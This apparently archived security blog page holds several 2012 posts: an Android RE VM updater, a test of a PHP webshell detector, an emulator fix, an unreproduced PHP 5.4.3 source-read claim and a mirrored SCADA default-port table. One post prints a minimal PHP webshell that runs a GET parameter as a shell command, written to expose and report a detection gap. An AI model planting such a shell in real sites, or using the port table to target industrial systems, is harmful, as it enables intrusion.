Posted: August 25th, 2012 | Author: xanda | Filed under: IT Related | No Comments »
Hi everyone and Eid Mubarak to my Muslim friends.
If you haven’t heard about A.R.E. yet, it is basically The Android Reverse Engineering (A.R.E.) Virtual Machine that combines the latest Android malware analysis tools in a readily accessible toolbox.
Tools currently found on A.R.E. are:
A github repo created by the A.R.E maintainer for easy installation and update, however the rapid development of each individual project above, does not sync with the update of the A.R.E github repo. This is why AREsoft-updater was created.
AREsoft-updater is an updater script for Android Reverse Engineering Software belongs to ARE VM from the Honeynet Project
AREsoft-updater will check for the latest available version of each individual project/tool listed above and compare it with the local (installed) version in A.R.E. If newer version is available, AREsoft-updater will automatically download and install the update for your A.R.E
AREsoft-updater also support the latest (recently released) DroidBox for Android 2.3 and APIMonitor
AREsoft-updater will require curl to work. Kindly install curl in your A.R.E virtual machine
AREsoft-updater is released under WTFPL (Do What The Fuck You Want To Public License) at my github https://github.com/xanda/AREsoft-updater
Thanks
Posted: August 10th, 2012 | Author: xanda | Filed under: IT Related | 1 Comment »
Hi and Ramadan Mubarak to my Muslim friends.
Last few night I saw a twitter update from @pentestit on a project called PHP-Shell-Detector; a php script that helps you find and identify php/cgi(perl)/asp/aspx shells.
My friends and I were a bit disappointed because we have developed the same thing but not yet released to the public for no reason.
But speaking about PHP-Shell-Detector, new stuff still need to be tested 🙂 so I’ve put it into a test
I’ve tested with a webshell I’ve found in the wild. Impressive.. PHP-Shell-Detector managed to detect it. The GUI and ajax was nice as well
I’ve spent some time to take a look at the code and found that the “suspicious functions used” part was implemented with the use of regex and I’ve found that something is missing.. So i’ve created a simple webshell to test my theory. So here is my code:
<?php
$cmd = $_GET['cmd'];
echo `$cmd`;
?> |
<?php
$cmd = $_GET['cmd'];
echo `$cmd`;
?>
And lets see the result:
This is due to the backtick is not in the regex and I believe it is not in the signature part as well.
I’ve reported this issue on the github page and comeout with the regex and tokenizer suggestion as the solution but from the response that i’ve get, i dont think it will be implemented in this near soon.
Anyway.. As overall, PHP-Shell-Detector is a good project and would help the webmaster to simplify the process of “searching” the hidden planted shell in their website.
Thanks
[Update]
I’ve received an email from the project maintainer saying that the regex has been update. Awesome! 🙂
Posted: August 2nd, 2012 | Author: xanda | Filed under: IT Related | Tags: 64bit, Android, emulator, ubuntu | No Comments »
SDL init failure, reason is: No available video device |
SDL init failure, reason is: No available video device
If you are getting the above error while launching Android emulator on 64bit OS, these are what you need to do:
sudo apt-get update
sudo apt-get install ia32-libs |
sudo apt-get update
sudo apt-get install ia32-libs
Thats all.. Now relaunch you emulator.
Thanks
Updated on 7th August 2012
Here is another tips for you on How to Start Intel Hardware-assisted Virtualization (hypervisor) on Linux to Speed-up Intel Android x86 Gingerbread Emulator
Posted: June 15th, 2012 | Author: xanda | Filed under: IT Related | Tags: 5.4.3, Code Read Vulnerability, php | 2 Comments »
As posted on http://1337day.com/exploits/18605, cheki claimed that PHP 5.4.3 is vulnerable to code read vulnerability, where the PHP interpreter will fail to execute the file once ‘~’ symbol added to the end of the file name. Snipped from the PoC:
=============================================================
#Demo: [root@cheki]# curl 109.234.119.2/index.php~
result: <!--?php phpinfo(); ?-->
#Target: http://localhost/index.php~
result: <!--?php phpinfo(); ?-->
============================================================
[root@cheki]# curl 109.234.119.2/index.php
result: NULL
#Target: http://localhost/index.php
result: NULL
=========================================================== |
=============================================================
#Demo: [root@cheki]# curl 109.234.119.2/index.php~
result: <!--?php phpinfo(); ?-->
#Target: http://localhost/index.php~
result: <!--?php phpinfo(); ?-->
============================================================
[root@cheki]# curl 109.234.119.2/index.php
result: NULL
#Target: http://localhost/index.php
result: NULL
===========================================================
Ok.. Since I had a test machine (Ubuntu) SSHed earlier, so I stright away add a new PPA repo (https://launchpad.net/~ondrej/+archive/php5) and install PHP 5.4.3. So here is my version to verify the PoC:
xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html> |
xanda@vostro:~$ php -v
PHP 5.4.3-4~precise+1 (cli) (built: May 17 2012 13:00:25)
Copyright (c) 1997-2012 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
xanda@vostro:~$ curl 127.0.0.1/index.php
<form action="" method="post">
<input type="text" name="lala">
<input type="submit">
</form>
xanda@vostro:~$ curl 127.0.0.1/index.php~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php~ was not found on this server.</p>
<hr>
<address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
Hurmmmm okkkk…. I haven’t tested on Fedora release 17 (Beefy Miracle) as claimed by the author, but I think this is… You name it..
Please take note that most of GUI based text editor (eg: Gedit) will (auto)save your edited file into a backup file with the same file name but ended with ‘~’… Just like in the PoC huh?
If anyone managed to test it on Fedora release 17 (Beefy Miracle), kindly drop me the result on the comment section. Thanks in advance
Cheers 🙂
Mirror for the advisory: http://pastebin.com/H1tjRDpD
Update
1) @Netasq has given 2 workarounds for this issue.
- http://twitter.com/Netasq/status/213647398025703425
In case you can't update PHP to 5.4.4, a quick Apache fix ‪#security‬ (1/2) Order allow,deny Deny from all |
In case you can't update PHP to 5.4.4, a quick Apache fix ‪#security‬ (1/2) Order allow,deny Deny from all
2) Its not listed here (or I’ve missed it?) :- http://www.php.net/ChangeLog-5.php
Posted: June 14th, 2012 | Author: xanda | Filed under: IT Related | Tags: port, SCADA | No Comments »
Just re-mirror for http://pastebin.com/EwCibKgc
# Default Scada Ports
- xflix
+-------+---------------------------------------+
| Port | Description |
+-------+---------------------------------------+
| 502 | Modbus |
| 1089 | Foundation Fieldbus HSE |
| 1090 | Foundation Fieldbus HSE |
| 1091 | Foundation Fieldbus HSE |
| 1541 | Foxboro/Invensys Foxboro DCS Informix |
| 1883 | MQ Telemetry Transport |
| 2222 | EtherNet/IP |
| 3480 | OPC UA Discovery Server |
| 4000 | Emerson/Fisher ROC Plus |
| 4592 | Project/SCADA Node Primary Port |
| 5050 | Telvent OASyS DNA |
| 5052 | Telvent OASyS DNA |
| 5065 | Telvent OASyS DNA |
| 5450 | OSIsoft PI Server |
| 10307 | ABB Ranger 2003 |
| 10311 | ABB Ranger 2003 |
| 10364 | ABB Ranger 2003 |
| 10407 | ABB Ranger 2003 |
| 10409 | ABB Ranger 2003 |
| 10412 | ABB Ranger 2003 |
| 10414 | ABB Ranger 2003 |
| 10428 | ABB Ranger 2003 |
| 10431 | ABB Ranger 2003 |
| 10447 | ABB Ranger 2003 |
| 10449 | ABB Ranger 2003 |
| 12316 | ABB Ranger 2003 |
| 12645 | ABB Ranger 2003 |
| 12647 | ABB Ranger 2003 |
| 13722 | ABB Ranger 2003 |
| 11001 | Johnson Controls Metasys N1 |
| 12135 | Telvent OASyS DNA |
| 13724 | ABB Ranger 2003 |
| 13782 | ABB Ranger 2003 |
| 14592 | SCADA Node Secondary Port |
| 18000 | Iconic Genesis32 GenBroker (TCP) |
| 19999 | DNP |
| 20000 | DNP3 |
| 34962 | PROFINET |
| 34963 | PROFINET |
| 34964 | PROFINET |
| 34980 | EtherCAT |
| 38589 | ABB Ranger 2003 |
| 38593 | ABB Ranger 2003 |
| 38000 | SNC GENe |
| 38011 | SNC GENe |
| 38014 | SNC GENe |
| 38200 | SNC GENe |
| 38210 | SNC GENe |
| 38301 | SNC GENe |
| 38400 | SNC GENe |
| 38600 | ABB Ranger 2003 |
| 38700 | SNC GENe |
| 38971 | ABB Ranger 2003 |
| 39129 | ABB Ranger 2003 |
| 39278 | ABB Ranger 2003 |
| 44818 | EtherNet/IP |
| 45678 | Foxboro/Invensys Foxboro DCS AIMAPI |
| 47808 | BACnet/IP |
| 50001 | Siemens Spectrum Power TG |
| 50018 | Siemens Spectrum Power TG |
| 50020 | Siemens Spectrum Power TG |
| 50025 | Siemens Spectrum Power TG |
| 50110 | Siemens Spectrum Power TG |
| 55000 | FL-net Reception |
| 55003 | FL-net Transmission |
| 55550 | Foxboor/Invensys Foxboro DCS FoxAPI |
| 56001 | Telvent OASyS DNA |
| 62900 | SNC GENe |
| 62911 | SNC GENe |
| 62924 | SNC GENe |
| 62930 | SNC GENe |
| 62938 | SNC GENe |
| 62956 | SNC GENe |
| 62963 | SNC GENe |
| 62981 | SNC GENe |
| 62985 | SNC GENe |
| 62992 | SNC GENe |
| 63012 | SNC GENe |
| 63027 | SNC GENe |
| 63041 | SNC GENe |
| 63075 | SNC GENe |
| 63079 | SNC GENe |
| 63082 | SNC GENe |
| 63088 | SNC GENe |
| 63094 | SNC GENe |
| 65443 | SNC GENe |
+-------+---------------------------------------+ |
# Default Scada Ports
- xflix
+-------+---------------------------------------+
| Port | Description |
+-------+---------------------------------------+
| 502 | Modbus |
| 1089 | Foundation Fieldbus HSE |
| 1090 | Foundation Fieldbus HSE |
| 1091 | Foundation Fieldbus HSE |
| 1541 | Foxboro/Invensys Foxboro DCS Informix |
| 1883 | MQ Telemetry Transport |
| 2222 | EtherNet/IP |
| 3480 | OPC UA Discovery Server |
| 4000 | Emerson/Fisher ROC Plus |
| 4592 | Project/SCADA Node Primary Port |
| 5050 | Telvent OASyS DNA |
| 5052 | Telvent OASyS DNA |
| 5065 | Telvent OASyS DNA |
| 5450 | OSIsoft PI Server |
| 10307 | ABB Ranger 2003 |
| 10311 | ABB Ranger 2003 |
| 10364 | ABB Ranger 2003 |
| 10407 | ABB Ranger 2003 |
| 10409 | ABB Ranger 2003 |
| 10412 | ABB Ranger 2003 |
| 10414 | ABB Ranger 2003 |
| 10428 | ABB Ranger 2003 |
| 10431 | ABB Ranger 2003 |
| 10447 | ABB Ranger 2003 |
| 10449 | ABB Ranger 2003 |
| 12316 | ABB Ranger 2003 |
| 12645 | ABB Ranger 2003 |
| 12647 | ABB Ranger 2003 |
| 13722 | ABB Ranger 2003 |
| 11001 | Johnson Controls Metasys N1 |
| 12135 | Telvent OASyS DNA |
| 13724 | ABB Ranger 2003 |
| 13782 | ABB Ranger 2003 |
| 14592 | SCADA Node Secondary Port |
| 18000 | Iconic Genesis32 GenBroker (TCP) |
| 19999 | DNP |
| 20000 | DNP3 |
| 34962 | PROFINET |
| 34963 | PROFINET |
| 34964 | PROFINET |
| 34980 | EtherCAT |
| 38589 | ABB Ranger 2003 |
| 38593 | ABB Ranger 2003 |
| 38000 | SNC GENe |
| 38011 | SNC GENe |
| 38014 | SNC GENe |
| 38200 | SNC GENe |
| 38210 | SNC GENe |
| 38301 | SNC GENe |
| 38400 | SNC GENe |
| 38600 | ABB Ranger 2003 |
| 38700 | SNC GENe |
| 38971 | ABB Ranger 2003 |
| 39129 | ABB Ranger 2003 |
| 39278 | ABB Ranger 2003 |
| 44818 | EtherNet/IP |
| 45678 | Foxboro/Invensys Foxboro DCS AIMAPI |
| 47808 | BACnet/IP |
| 50001 | Siemens Spectrum Power TG |
| 50018 | Siemens Spectrum Power TG |
| 50020 | Siemens Spectrum Power TG |
| 50025 | Siemens Spectrum Power TG |
| 50110 | Siemens Spectrum Power TG |
| 55000 | FL-net Reception |
| 55003 | FL-net Transmission |
| 55550 | Foxboor/Invensys Foxboro DCS FoxAPI |
| 56001 | Telvent OASyS DNA |
| 62900 | SNC GENe |
| 62911 | SNC GENe |
| 62924 | SNC GENe |
| 62930 | SNC GENe |
| 62938 | SNC GENe |
| 62956 | SNC GENe |
| 62963 | SNC GENe |
| 62981 | SNC GENe |
| 62985 | SNC GENe |
| 62992 | SNC GENe |
| 63012 | SNC GENe |
| 63027 | SNC GENe |
| 63041 | SNC GENe |
| 63075 | SNC GENe |
| 63079 | SNC GENe |
| 63082 | SNC GENe |
| 63088 | SNC GENe |
| 63094 | SNC GENe |
| 65443 | SNC GENe |
+-------+---------------------------------------+
